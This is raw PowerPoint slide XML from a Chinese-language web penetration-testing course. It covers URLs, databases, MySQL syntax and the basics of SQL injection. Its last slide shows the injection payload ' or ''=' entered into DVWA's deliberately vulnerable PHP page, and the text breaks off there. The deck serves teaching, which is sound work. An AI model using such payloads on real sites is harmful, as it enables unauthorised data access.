            <a:ext cx="10631938" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看扫描结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F44FE8AD-E085-40A5-9AB4-B2D52F4B7C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1877622" y="2008805"/>
            <a:ext cx="8600655" cy="4628440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2659509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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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介绍</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信息收集</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>渗透</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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后门</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内网渗透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社会工程学</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检测</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endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11520977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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546135" y="2092444"/>
            <a:ext cx="10631938" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>统一资源定位符（或称统一资源定位器、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，英语：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Uniform Resource Locator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，常缩写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），俗称为网页地址（网址）。如同在网络上的门牌，是因特网上标准的资源的地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）。它最初是由蒂姆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>伯纳斯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>李发明用来作为万维网的地址。现在它已经被万维网联盟编制为因特网标准。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>标准格式为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:[//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>]][/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>资源层级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>[?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>片段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ID]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>举例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	http://www.katoombagroup.org/details.php?id=56</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37749744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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546135" y="1907507"/>
            <a:ext cx="10631938" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据库简而言之可视为电子化的文件柜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存储电子文件的处所，用户可以对文件中的数据进行新增、截取、更新、删除等操作。所谓“数据库”是以一定方式储存在一起、能与多个用户共享、具有尽可能小的冗余度、与应用程序彼此独立的数据集合。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 	MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一种开放源代码的关系型数据库管理系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RDBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），使用最常用的数据库管理语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>结构化查询语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）进行数据库管理。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是开放源代码的，因此任何人都可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>General Public License</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的许可下下载并根据个性化的需要对其进行修改。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>因为其速度、可靠性和适应性而备受关注。大多数人都认为在不需要事务化处理的情况下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是管理内容最好的选择。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3015474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一、介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1FB15D-CAFA-4F14-A8D7-2060A8E52258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1735494" y="891082"/>
            <a:ext cx="7900048" cy="5966918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27673272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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2271401"/>
            <a:ext cx="12208812" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>基本语法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>从数据库中获取用户名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>且密码为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>pass”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的用户：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username=admin AND password=pass;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>插入数据：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( field1, field2,…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fieldN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ) VALUES ( value1, value2,…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valueN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改数据：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SET field1=new-value1, field2=new-value2 [WHERE Clause];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="487635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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="1375532"/>
            <a:ext cx="12208812" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>                                                 DVWA-low     PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>源代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入正常用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>拼接得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=admin;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>得到用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的用户名和昵称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入恶意内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or ''='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时</a:t>
            </a:r>
          </a:p>
